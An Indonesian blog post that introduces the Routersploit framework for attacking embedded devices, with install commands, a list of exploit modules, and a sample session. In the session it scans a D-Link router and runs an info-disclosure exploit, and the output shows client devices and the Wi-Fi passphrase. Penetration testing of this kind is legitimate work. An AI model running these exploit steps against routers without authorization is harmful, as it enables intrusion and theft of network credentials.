Sebenaranya sudah lama ingin share tools ini, namun baru kali ini saya ingat tools ini dan ingin share kepada kalian pembaca setia artikel dunia peretas.

Routersploit merupakan sebuah tools opensource (sumber terbuka) diciptakan oleh Marcin Bury, 0burner, dan Mariusz Kupidura yang di dekasikan untuk perangkat embedded.
Pada tools routersploit terdapat beberapa module yang digunakan untuk pengujian pentrasi antara lain:
- eksploitasi - modul yang mengambil keuntungan dari kerentanan diidentifikasi
- creds - modul dirancang untuk menguji terhadap layanan jaringan
- scanner - modul yang memeriksa apakah target rentan terhadap eksploitasi
Routersploit support
- ftp
- ssh
- telnet
- http auth dasar
- bentuk http auth
- snmp
Installasi Routersploit
- Installasi pada kali linux
git clone https://github.com/reverse-shell/routersploit
cd routersploit
./rsf.py
- Installasi pada ubuntu 16.04
sudo apt-get install python-dev python-pip libncurses5-dev git git clone https://github.com/reverse-shell/routersploit cd routersploit pip install -r requirements.txt ./rsf.py
- Installasi pada osx
it clone https://github.com/reverse-shell/routersploit cd routersploit sudo easy_install pip sudo pip install -r requirements.txt ./rsf.py
- Update routersploit
cd routersploit git pull
- Penggunaan
./rsf.py
Exploitasi
- Daftar module
rsf > use exploits/ exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ rsf > use exploits/dlink/dir_300_600_rce rsf (D-LINK DIR-300 & DIR-600 RCE) >
Scanner
Contoh scanner kerentanan exploitasi dlink router
- Pilih module
rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options
- Opsi
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. http://192.168.1.1
port 80 Target port
- Pilih target
rsf (D-Link Scanner) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
- Jalankan module
rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable
[+] Device is vulnerable!
- exploits/dlink/dwr_932_info_disclosure
Telah diverifikasi bahwa target rentan untuk dwr_932_info_disclosure mengeksploitasi. Sekarang menggunakan modul yang tepat dan mengeksploitasi sasaran.
rrsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (D-Link DWR-932 Info Disclosure) > exploit
[*] Running module...
[*] Decoding JSON value
[+] Exploit success
Parameter Value
--------- -----
get_wps_enable 0
wifi_AP1_enable 1
get_client_list 9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0
wifi_AP1_ssid dlink-DWR-932
get_mac_address c4:00:f5:00:ec:40
wifi_AP1_security_mode 3208,8
wifi_AP1_hidden 0
get_mac_filter_switch 0
wifi_AP1_passphrase MyPaSsPhRaSe
get_wps_mode 0
Sumber: Routersploit
Sekian dari saya apabila ada kesalahan dalam penulisan mohon maaf sebesar-besarnya selamat malam dan selamat mecoba Good Luck!!
0 Komentar
Penulisan markup di komentar